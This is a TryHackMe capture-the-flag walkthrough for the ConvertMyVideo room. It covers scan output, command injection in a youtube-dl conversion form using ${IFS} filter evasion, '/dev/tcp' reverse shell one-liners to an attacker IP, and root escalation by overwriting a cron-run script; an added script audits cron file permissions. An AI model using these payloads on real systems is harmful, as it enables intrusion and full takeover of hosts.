TryHackMe - ConvertMyVideo


Starting Nmap 7.60 ( ) at 2022-07-05 21:48 BST
Stats: 0:20:37 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 22:09 (0:00:00 remaining)
Nmap scan report for (
Host is up (0.00047s latency).
Not shown: 65533 closed ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 65:1b:fc:74:10:39:df:dd:d0:2d:f0:53:1c:eb:6d:ec (RSA)
|   256 c4:28:04:a5:c3:b9:6a:95:5a:4d:7a:6e:46:e2:14:db (ECDSA)
|_  256 ba:07:bb:cd:42:4a:f2:93:d1:05:d0:b3:4c:b1:d9:b1 (EdDSA)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 02:61:5C:CF:D0:3B (Unknown)
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 1381.76 seconds

Port 80


└─# gobuster dir -u -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2022/07/06 17:18:46 Starting gobuster in directory enumeration mode
/images               (Status: 301) [Size: 315] [-->]
/admin                (Status: 401) [Size: 460]                                   
/js                   (Status: 301) [Size: 311] [-->]    
/tmp                  (Status: 301) [Size: 312] [-->]

Apache version

  • Apache httpd 2.4.29 - CVE-2021-41773


  • This went nowhere: CVE-2021-41773 affects Apache 2.4.49, not the 2.4.29 running here

The dl functionality

  • First I inspected the request in Burp, sent it to my Repeater and played with it a little

  • Here are the interesting elements of the response

Unable to download webpage: HTTP Error 401: Unauthorized (caused by HTTPError()); please report this issue on https:\/\/\/bug . Make sure you are using the latest version; type  youtube-dl -U  to update. Be sure to call youtube-dl with the --verbose flag and include its complete output
  • According to this, it is using a binary called youtube-dl and puts the converted video in a downloads folder in /tmp

  • We can check the youtube-dl documentation for more info

  • We can still get our user flag this way, since we saw it listed by the previous command that worked: cat${IFS}admin/flag.txt

  • Let's try to get a reverse shell. All the reverse shell one-liners have a dash sign in them, so let's see if we can wget a homemade file with a one-liner shell in it and execute it afterwards.

  • We make a file called and put this in it

bash -i >& /dev/tcp/ATTACKING-MACHINE-IP/4444 0>&1
  • Replace ATTACKING-MACHINE-IP in the script with your IP

  • And we launch our Python HTTP server in the folder where our shell is

  • Let's stabilize our shell: python3 -c 'import pty; pty.spawn("/bin/bash")'

  • Let's try to overwrite


  • If we execute linpeas on the target we see that cron is running as root.

  • Let's get pspy onto our target and execute it

bash /var/www/html/tmp/ 
/bin/sh -c cd /var/www/html/tmp && bash /var/www/html/tmp/ 
/usr/sbin/CRON -f
  • The clean is just an rm -rf downloads

  • Let's launch a listener: rlwrap nc -lvp 5555

  • echo "bash -i >& /dev/tcp/ 0>&1" > /var/www/html/tmp/
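
The escalation above works because root's cron executes a script under /var/www/html/tmp, a location the shell's user can write to. As an added example (not part of the original write-up), this check reports when a cron target or its parent directory can be changed by anyone other than root; the function names and demo layout are hypothetical, and GNU stat is assumed.

```sh
#!/bin/sh
# Added example, not from the write-up. Assumes GNU coreutils stat (Linux);
# function names are hypothetical.

# path_findings PATH TRUSTED_UID: print one line per problem found on PATH.
path_findings() (
    path=$1; trusted_uid=$2
    if [ ! -e "$path" ]; then
        echo "MISSING $path"   # cron points at something that does not exist
        exit 0
    fi
    owner=$(stat -L -c '%u' -- "$path")
    mode=$(stat -L -c '%a' -- "$path")   # octal, e.g. 755 or 1777
    other=${mode#"${mode%?}"}            # last octal digit
    rest=${mode%?}
    group=${rest#"${rest%?}"}            # second-to-last octal digit
    [ "$owner" = "$trusted_uid" ] || echo "OWNER uid=$owner $path"
    case "$group" in 2|3|6|7) echo "GROUP-WRITABLE mode=$mode $path" ;; esac
    case "$other" in 2|3|6|7) echo "WORLD-WRITABLE mode=$mode $path" ;; esac
    exit 0
)

# audit_cron_target SCRIPT [TRUSTED_UID]: succeed only if nobody except
# TRUSTED_UID (default 0, root) can change what cron executes. The parent
# directory is checked too: write access there is enough to replace SCRIPT.
audit_cron_target() (
    script=$1; trusted_uid=${2:-0}
    findings=$(path_findings "$script" "$trusted_uid"
               path_findings "$(dirname -- "$script")" "$trusted_uid")
    [ -z "$findings" ] && exit 0
    printf '%s\n' "$findings"
    exit 1
)

# Constructed demo: the same job in a world-writable directory (the target's
# situation) and in a locked-down one. Files belong to the current user here,
# so that uid stands in for root.
demo=$(mktemp -d); trap 'rm -rf "$demo"' EXIT
mkdir "$demo/webtmp" "$demo/locked"
printf 'rm -rf downloads\n' | tee "$demo/webtmp/job.sh" > "$demo/locked/job.sh"
chmod 777 "$demo/webtmp"; chmod 666 "$demo/webtmp/job.sh"
chmod 755 "$demo/locked" "$demo/locked/job.sh"
for job in "$demo/webtmp/job.sh" "$demo/locked/job.sh"; do
    audit_cron_target "$job" "$(id -u)" && echo "OK $job" || echo "FAIL $job"
done
```

On a real host, pass the script path from the crontab entry and omit the second argument so ownership is compared against root.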


  • What is the name of the secret folder? admin (we get this using gobuster, see above)

  • What is the user to access the secret folder? To find this, once we have our reverse shell we run cat admin/.htpasswd; we will get the user and password inside this file.

  • I'll let you find the flags on your own :)
